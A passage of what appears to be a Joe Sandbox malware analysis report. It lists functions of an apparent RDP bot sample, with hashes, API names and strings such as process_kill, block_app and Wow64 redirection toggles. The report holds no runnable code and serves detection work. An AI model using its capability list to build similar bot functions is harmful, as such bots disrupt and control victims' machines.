                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 88c05cf3388c31f6539c777c819c7d3a90aec0ace9ad2e7913c4a6265e0f6128
                    • Instruction ID: fcef8ee9c6ac7b85111d14f3af3749fc48d99a1542dab6aff9d6044288ea6212
                    • Opcode Fuzzy Hash: 88c05cf3388c31f6539c777c819c7d3a90aec0ace9ad2e7913c4a6265e0f6128
                    • Instruction Fuzzy Hash: 8411AF16A09B0366FA647F53ACC0B3AA690AF45785F8C0C75CD0E062D5DF6DFC758220
                    Function 00007FF704892471 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 13135dc92655dd0311b3d6bf8182c1d35b336fe44a1bbcbcee5e7a69c6267571
                    • Instruction ID: 423cede8a48fefea5a2354057bf6e0c971d09ed3ad8fb34f0876c4cafb80d5e2
                    • Opcode Fuzzy Hash: 13135dc92655dd0311b3d6bf8182c1d35b336fe44a1bbcbcee5e7a69c6267571
                    • Instruction Fuzzy Hash: BE11AF16A09B0362FA647F53ACC0B3AA690AF45785F8C0C75CD0E066D5DF6DFC758220
                    Function 00007FF70489246A Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 428854276a19afd972f6b4d6ee3694a8adab8d34ab153aabfc6d5cf6082bcee5
                    • Instruction ID: 2f165abf989e21611120181e2ad008377361ef6ea3d779a54e7069946dbf93cd
                    • Opcode Fuzzy Hash: 428854276a19afd972f6b4d6ee3694a8adab8d34ab153aabfc6d5cf6082bcee5
                    • Instruction Fuzzy Hash: 0211AF16A09B0366FA647F53ACC0B3AA690AF45785F8C0C75CD0E062D5DF6DFC758220
                    Function 00007FF704892463 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 64c6a43e05c053217d390114a923dfece3a0f6ad1aba6964d62390b6ba7d5058
                    • Instruction ID: bd3fc6c823deddff94a4f4c5fc4a7f8b5ef0e6d16658b8136252f2faa255d325
                    • Opcode Fuzzy Hash: 64c6a43e05c053217d390114a923dfece3a0f6ad1aba6964d62390b6ba7d5058
                    • Instruction Fuzzy Hash: 9911AF16A09B0362FA657F53ACC0B3AA690AF45785F8C0C75CD0E062D5DF6DFC758221
                    Function 00007FF704895189 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CopyErrorFileLastfflushfwrite
                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                    • API String ID: 2887799713-3464183404
                    • Opcode ID: a69eb8bfe6720e7fe071f149a0ba004c6831c9e0fa074345eb1c7da25808f617
                    • Instruction ID: d8bec77612d045ef0e97df815306858e60070c289a66ca4e2c6d6096e74fd3fc
                    • Opcode Fuzzy Hash: a69eb8bfe6720e7fe071f149a0ba004c6831c9e0fa074345eb1c7da25808f617
                    • Instruction Fuzzy Hash: 3941715390DA16A1FA266F57AC80B79D6547F01BCCEDC0932C90F066D4EF9CBEA19321
                    Function 00007FF704894BBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                    • API String ID: 2018770650-4119452840
                    • Opcode ID: eae0ad0529d85d7c6d721daa2f0adb39329f1e0d04141bbba5f626ec2f22a190
                    • Instruction ID: dd23040084022dbf46e6902405f30b25228f6633ca32dac07346c1aeee266ccf
                    • Opcode Fuzzy Hash: eae0ad0529d85d7c6d721daa2f0adb39329f1e0d04141bbba5f626ec2f22a190
                    • Instruction Fuzzy Hash: 5F31FC19E0CE0655FA607E46ACC0B79A2514F85B44EDD0D32CA1E072D1EF6CBDA69322
                    Function 00007FF70489749C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                    • API String ID: 39653677-892027187
                    • Opcode ID: fafdafe653b9ac92441e29dc3b04a1d9ce8b4508dbd218ce2f7c162b279029fe
                    • Instruction ID: 01a44442677f32bbf80b09a4e593cf657da0b1f66707ad7f38c8deb2e10c4d78
                    • Opcode Fuzzy Hash: fafdafe653b9ac92441e29dc3b04a1d9ce8b4508dbd218ce2f7c162b279029fe
                    • Instruction Fuzzy Hash: B651D152A19993D5FE96BE57AC90FB596517F00B88FCC0832D94E0A2D4DF6CFD318220
                    Function 00007FF704896C99 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen$strcat
                    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                    • API String ID: 2335785903-2423714266
                    • Opcode ID: e2649656a3eea21e57497fc96b6ce74672c4d11e199c284366f561a3de01ebd7
                    • Instruction ID: 93defa54ecb8ea6a9e297eb6c692c70c44c57ad11dbd06aa87a222d1a932a38c
                    • Opcode Fuzzy Hash: e2649656a3eea21e57497fc96b6ce74672c4d11e199c284366f561a3de01ebd7
                    • Instruction Fuzzy Hash: 00119D62A08A4344FA117F17AC94BB596816F02B88F8C4830EE0D1A2C2FF6DA8348360
                    Function 00007FF70489CACD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fwprintf$strlen
                    • String ID: %*.*S$%-*.*S$%.*S
                    • API String ID: 2636243462-2115465065
                    • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                    • Instruction ID: 303308e4f0bcf797b94b76c40e1813504aefd411357603b6aea83485549dc96f
                    • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                    • Instruction Fuzzy Hash: D931B662E18A5245E750BE279C80D78F691EF44BA4F88C931DD5D8BBC5DF2EF8208760
                    Function 00007FF70489385C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AddressErrorLastLibraryLoadProc
                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                    • API String ID: 3511525774-1584720945
                    • Opcode ID: fa2267f9570cbef4649007a3857e107e00d478d94a1d7705d6875d883778b630
                    • Instruction ID: fdb5a23c358fe9b2f3edaf27004acc6d405121ded3e38ca296656e32ff8a204b
                    • Opcode Fuzzy Hash: fa2267f9570cbef4649007a3857e107e00d478d94a1d7705d6875d883778b630
                    • Instruction Fuzzy Hash: AB11E861E1CA43A1FA55BF17ACC5BB492506F44309FC80835D80E56AE1EFACF974D320
                    Function 00007FF7048937C0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                    • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                    • API String ID: 1533789296-1853374401
                    • Opcode ID: 366d2cdfa6a1cbe36298f6c9d0e678363a7b7cb7144b63d0885a61954be76f18
                    • Instruction ID: 65857f998318750bbb356a01487421a3395574f5b1a80488a0ac970d03e75650
                    • Opcode Fuzzy Hash: 366d2cdfa6a1cbe36298f6c9d0e678363a7b7cb7144b63d0885a61954be76f18
                    • Instruction Fuzzy Hash: 3F01C561A1CA43A1FB55BF56ACC4AB492506F08309FC80836C80E566E1EFADF9759320
                    Function 00007FF7048933C0 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                    • API String ID: 2962429428-1801624891
                    • Opcode ID: 3b8a90e65239f1e38acdc01f402fb0f2ee0701ea53a1e2d90e4eea666d6df0fc
                    • Instruction ID: b7281f74293e97276ad69663904b5d6fbb7985eea6ee6476ec8506d7237ffaf0
                    • Opcode Fuzzy Hash: 3b8a90e65239f1e38acdc01f402fb0f2ee0701ea53a1e2d90e4eea666d6df0fc
                    • Instruction Fuzzy Hash: C8F0F866A4884B81FA20EF66FC909A8A720BF44748FC80972DD0D476A09F7CE966C310
                    Function 00007FF704897E04 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: DeviceErrorLastQuery
                    • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                    • API String ID: 963133057-3473575966
                    • Opcode ID: eb14956f55811ff294041cf14e61d777e1723efa0de7130191ce6054b43d6e2b
                    • Instruction ID: eb49540c74e2fc575afcadacb46ce0e04ffbf40e43d67b2583b32462dbe2a05c
                    • Opcode Fuzzy Hash: eb14956f55811ff294041cf14e61d777e1723efa0de7130191ce6054b43d6e2b
                    • Instruction Fuzzy Hash: F6413A52E2CA97C1FA207E169CC4BB9D251AF40B94F9D0832DD4E276C5DF6CBCA08261
                    Function 00007FF70489CCD9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fwprintf
                    • String ID: %*.*s$%-*.*s$%.*s$%S%S
                    • API String ID: 968622242-2451587232
                    • Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                    • Instruction ID: 12019390bfd818c1a464e3cb984f65936dc41bbcb435fe8fc6d49b5ba160a05b
                    • Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                    • Instruction Fuzzy Hash: C4317672E0894345F760AE279C84D79EA90EF44B94F8CC931D9094B6C9DF2DFC219760
                    Function 00007FF7048989E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    • Opcode ID: 3291001683a13ebc5dc5c5edda057e9efd9023fddcfa1d8c289d3b1e70410d58
                    • Instruction ID: f3243ad98e61524bc4f39c490784b7ee7f7b4155d28dc7da1d428c016e3f0339
                    • Opcode Fuzzy Hash: 3291001683a13ebc5dc5c5edda057e9efd9023fddcfa1d8c289d3b1e70410d58
                    • Instruction Fuzzy Hash: E9F04952A1CA0391FA247F1B9CC8A789691AF46744FC85C32C54E8A2D5DFACFCB08320
                    Function 00007FF7048989E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    • Opcode ID: 43537e79359e21edf02543d847a71dab3b35628546990b0e087ced3cf1329bff
                    • Instruction ID: 8b2e5d87fbbebb615dc6a31b8e45049ff2574903b9d4f45d6912c368ece85c6c
                    • Opcode Fuzzy Hash: 43537e79359e21edf02543d847a71dab3b35628546990b0e087ced3cf1329bff
                    • Instruction Fuzzy Hash: 59F04952A1CA0395FA247F1B9CC89789691AF46744FC85C31C54E8A2D5EFACFCB08320
                    Function 00007FF7048989D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
